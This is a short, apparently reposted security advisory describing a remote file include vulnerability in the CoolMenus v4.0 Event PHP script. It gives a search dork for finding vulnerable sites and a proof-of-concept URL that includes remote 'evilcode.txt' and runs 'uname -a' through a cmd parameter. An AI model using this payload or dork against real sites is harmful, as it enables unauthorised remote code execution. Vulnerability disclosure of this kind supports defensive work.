|
|
Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html=0D
=0D
#ColMenus Event Remote File Include Vulnerability#=0D
#Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed]=0D
#Script : CoolMenus v4.0 Event Script=0D
#Risk : High=0D
#Class : Remote=0D
#Greetz : B3g0k,Nistiman,Flot,Netqurd etc..=0D
#d0rk : "/event/index.php?page=" =0D
=0D
I.=0D
=0D
=0D
require("event_inc.php"); =0D
echo "Events"; =0D
$start = filectime($news); =0D
$jetzt = time(); =0D
$update = "$start"+"$timespan"; =0D
if($jetzt >= $update) =0D
{include("event_html.php");} =0D
=0D
II.=0D
=0D
Proof of Concept:=0D
=0D
http://www.site.com/[path]/event/index.php?page=evilcode.txt?&cmd=uname -a